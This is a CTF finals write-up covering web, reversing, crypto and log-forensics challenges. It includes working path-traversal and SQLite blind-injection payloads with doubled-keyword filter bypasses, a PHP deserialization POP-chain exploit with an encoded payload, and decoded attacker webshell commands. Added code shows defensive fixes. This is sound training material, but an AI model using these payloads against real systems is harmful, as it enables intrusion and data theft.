Part of the fourth Zhejiang CTF finals
2022-06-12 12:36:00 【Arnoldqqq】
Web
Ancient characteristics
A newline character bypasses the regex's line-start and line-end anchors; adding directory traversal after it lets the file be read:
/?file=hint/hint.txt%0a%0a%0a../../../../../../flag
justlogin_web
SQLite injection; the filter can be bypassed by double writing the keywords. I was in a hurry and didn't work out the SQLite table structure clearly. Writing blind injection by hand is not great, and I thought about writing an sqlmap tamper for the double writing, but I was nervous and failed to write it. I still need to practise writing scripts; I always just modify a previous script. Otherwise it could have been a web AK.
SQLite has a sqlite_master table that stores the SQL statements used to create the tables. Query that statement first, then ordinary boolean blind injection works:
' oorr substr((sselectelect grgroupoup_coonncat(sql) frfromom sqlite_maasster),{},1)>'{}' --
' oorr substr((sselectelect grogroupup_coonncat(flaggg) frfromom flaggghere),{},1)>'{}' --
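Why double writing works, as an added illustration that is not from the original write-up: the challenge's real filter is not on the page, so an assumed single-pass keyword blacklist is modelled here, shown beside a fixed-point version and beside the actual fix, a parameterized query on a constructed in-memory SQLite database.

```python
import re
import sqlite3

# Assumed single-pass blacklist (the challenge's real filter is not on the page).
BANNED = ("select", "union", "from", "group", "on", "as", "or")

def strip_once(s: str) -> str:
    """Remove each banned keyword in one pass: the weak filter."""
    for kw in BANNED:
        s = re.sub(re.escape(kw), "", s, flags=re.IGNORECASE)
    return s

def strip_to_fixpoint(s: str) -> str:
    """Re-run the filter until nothing changes, so doubled keywords collapse too."""
    prev = None
    while prev != s:
        prev, s = s, strip_once(s)
    return s

# The write-up's doubled payload with the format placeholders filled in.
DOUBLED = ("' oorr substr((sselectelect grgroupoup_coonncat(sql) "
           "frfromom sqlite_maasster),1,1)>'' --")

def weak_filter_passes(payload: str = DOUBLED) -> bool:
    """True when one pass of stripping turns the doubled text into live SQL."""
    cleaned = strip_once(payload).lower()
    return "select group_concat(sql) from sqlite_master" in cleaned

def fixpoint_filter_passes(payload: str = DOUBLED) -> bool:
    """True if any SELECT survives the fixed-point filter."""
    return "select" in strip_to_fixpoint(payload).lower()

def login_parameterized(username: str) -> int:
    """Constructed in-memory DB; the placeholder keeps the payload as plain data.
    A concatenated query would have been:
        "SELECT count(*) FROM users WHERE name='" + username + "'"
    """
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(name TEXT)")
    con.execute("INSERT INTO users VALUES ('admin')")
    row = con.execute("SELECT count(*) FROM users WHERE name=?", (username,)).fetchone()
    con.close()
    return row[0]
```

The fixed-point filter stops the doubling trick but also mangles legitimate input containing "as" or "on", which is why the parameterized query, not a better blacklist, is the real fix.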

Safepop
Got third blood on this one.
The POP chain is class B -> class A::__get -> class Fun::__call -> class Test::getFlag.
Exp:
<?php
// Sink: the stored callable makes Fun::__call end up in Test::getFlag
class Fun{
    private $func;
    public function __construct(){
        $this->func = [new Test,'getFlag'];
    }
}
class Test{
    public function getFlag(){
        //system("cat /flag?");
    }
}
class A{
    public $a;
}
class B{
    public $p;
}
$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;   // A::__get reaches Fun::__call through $a
$b->a = $a;     // dynamic property on B (not declared in the class) holding the A object
$b->p = "c";
// base64 so the \0 bytes around the private property name survive copying
echo base64_encode(serialize($b));
The private property name is wrapped in invisible \0 bytes that get lost when copying, so the payload is generated as base64, the object attribute count is then modified in Burp, and the result is URL-encoded to keep the invisible characters.
Payload:
/?pop=%4f%3a%31%3a%22%42%22%3a%32%3a%7b%73%3a%31%3a%22%70%22%3b%73%3a%31%3a%22%63%22%3b%73%3a%31%3a%22%61%22%3b%4f%3a%31%3a%22%41%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%46%75%6e%22%3a%32%3a%7b%73%3a%39%3a%22%00%46%75%6e%00%66%75%6e%63%22%3b%61%3a%32%3a%7b%69%3a%30%3b%4f%3a%34%3a%22%54%65%73%74%22%3a%30%3a%7b%7d%69%3a%31%3b%73%3a%37%3a%22%67%65%74%46%6c%61%67%22%3b%7d%7d%7d%7d

RE
The simplest reverse
Each input character has 50 added to it and the result is compared against a 40-byte target.


Code
# target bytes pulled from the binary
s = [0x76, 0x73, 0x85, 0x75, 0x86, 0x78, 0xAD, 0x6B, 0x97, 0x68, 0x98, 0x67, 0x64, 0x64, 0x62, 0x97, 0x68, 0x98, 0x6B, 0x6B, 0x96,
     0x67, 0x62, 0x69, 0x95, 0x96, 0x65, 0x96, 0x6A, 0x69, 0x69, 0x65, 0x66, 0x97, 0x68, 0x98, 0x6A, 0x95, 0x68, 0xAF]
print(len(s))  # 40
flag = ""
for i in s:
    flag += chr(i - 50)  # undo the +50
print(flag)
Crypto
decode_and_decode
Base64/base32 decoding in a loop.
After decoding 22 times we get the flag.
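An automated version of that loop, added here and not part of the original write-up: each layer is classified by its alphabet (base32 first, since base32 text is also valid base64), decoded, and the loop stops when the text is no longer valid base32/base64. The input is constructed by encoding a sample 22 times; the real challenge file is not on the page.

```python
import base64
import re
from typing import Optional, Tuple

B32_RE = re.compile(rb"^[A-Z2-7]+=*$")
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+=*$")

def decode_layer(data: bytes) -> Optional[bytes]:
    """Decode one base32 or base64 layer; None if the text is neither."""
    data = data.strip()
    if B32_RE.match(data):          # pure upper-case alphabet: try base32 first
        try:
            return base64.b32decode(data)
        except Exception:
            pass
    if B64_RE.match(data):
        try:
            return base64.b64decode(data, validate=True)
        except Exception:
            return None
    return None

def peel(data: bytes, max_rounds: int = 100) -> Tuple[bytes, int]:
    """Strip layers until the result is no longer base32/base64; return (plain, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = decode_layer(data)
        if nxt is None or nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def build_sample(plain: bytes, layers: int = 22) -> bytes:
    """Constructed input: alternate base32 and base64 encoding `layers` times."""
    for i in range(layers):
        plain = base64.b32encode(plain) if i % 2 == 0 else base64.b64encode(plain)
    return plain
```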

MISC
site_log
Auditing the logs shows requests to evil.php whose parameter carries the attacker's commands as ASCII codes. Record every attack parameter and decode the commands the attacker used:
<?php
echo(chr(108).chr(115));
echo("\r\n");
echo chr(99).chr(100).chr(32).chr(47);
echo("\r\n");
echo chr(108).chr(115);
echo("\r\n");
echo chr(99).chr(97).chr(116).chr(32).chr(102).chr(108).chr(97).chr(103);
echo("\r\n");
echo chr(119).chr(104).chr(111).chr(97).chr(109).chr(105);
echo("\r\n");
echo chr(122).chr(105).chr(112);
echo("\r\n");
echo chr(122).chr(105).chr(112).chr(32).chr(45).chr(114).chr(80).chr(32).chr(104).chr(101).chr(104).chr(101).chr(104).chr(101).chr(50).chr(51).chr(51).chr(95).chr(73).chr(103).chr(111).chr(116).chr(114).chr(111).chr(111).chr(116).chr(65281).chr(32).chr(102).chr(108).chr(97).chr(103).chr(46).chr(122).chr(105).chr(112).chr(32).chr(102).chr(108).chr(97).chr(103);
echo("\r\n");
echo chr(114).chr(109).chr(32).chr(102).chr(108).chr(97).chr(103);
echo("\r\n");
echo chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(73).chr(32).chr(65).chr(77).chr(32).chr(82).chr(79).chr(79).chr(84).chr(33).chr(33).chr(33).chr(33).chr(34);
echo("\r\n");

Use the archive password found in the command to decompress. A hex view shows the password contains a character that cannot be typed, so pasting it directly fails.
Decompress with a Python script instead:
import zipfile
zfile = zipfile.ZipFile("flag.zip")
# the last character is U+FF01 (fullwidth "!"), which cannot be typed directly
s = "hehehe233_Igotroot" + chr(0xFF01)
zfile.extractall(pwd=s.encode("utf-8"))
This yields the flag.
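A log-side decoder for the chr() chains, added here as an example that is not part of the original write-up: the exact log format is not on the page, so the sample lines are constructed in a combined-log-like shape, and only the evil.php parameter and the chr(n) syntax come from the write-up. Code points above 255 are kept as Unicode, the way the Python unzip script treats 0xFF01, rather than reduced mod 256 as PHP's chr() would do.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed access-log lines; the real log's exact shape is not on the page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2022:10:01:02 +0800] "GET /evil.php?cmd=chr(108).chr(115) HTTP/1.1" 200 51
10.0.0.5 - - [12/Jun/2022:10:01:09 +0800] "GET /evil.php?cmd=chr(99).chr(97).chr(116).chr(32).chr(102).chr(108).chr(97).chr(103) HTTP/1.1" 200 44
10.0.0.5 - - [12/Jun/2022:10:01:30 +0800] "GET /evil.php?cmd=chr(122).chr(105).chr(112).chr(32).chr(45).chr(80).chr(32).chr(65281) HTTP/1.1" 200 0
10.0.0.7 - - [12/Jun/2022:10:02:00 +0800] "GET /index.php HTTP/1.1" 200 1024
"""

REQ_RE = re.compile(r'"(?:GET|POST) (/evil\.php\?[^ "]+) HTTP')
CHR_RE = re.compile(r"chr\((\d+)\)")

def decode_chr_chain(expr: str) -> str:
    """Turn chr(n).chr(m)... into text; values above 255 stay Unicode code points."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(expr))

def extract_commands(log: str = SAMPLE_LOG) -> List[Tuple[str, str, bool]]:
    """Return (client_ip, decoded_command, has_non_ascii) for each evil.php request."""
    out = []
    for line in log.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue                      # not an evil.php request
        ip = line.split(" ", 1)[0]
        cmd = decode_chr_chain(unquote(m.group(1)))
        # flag commands with characters you could not type from a hex view
        out.append((ip, cmd, any(ord(c) > 127 for c in cmd)))
    return out
```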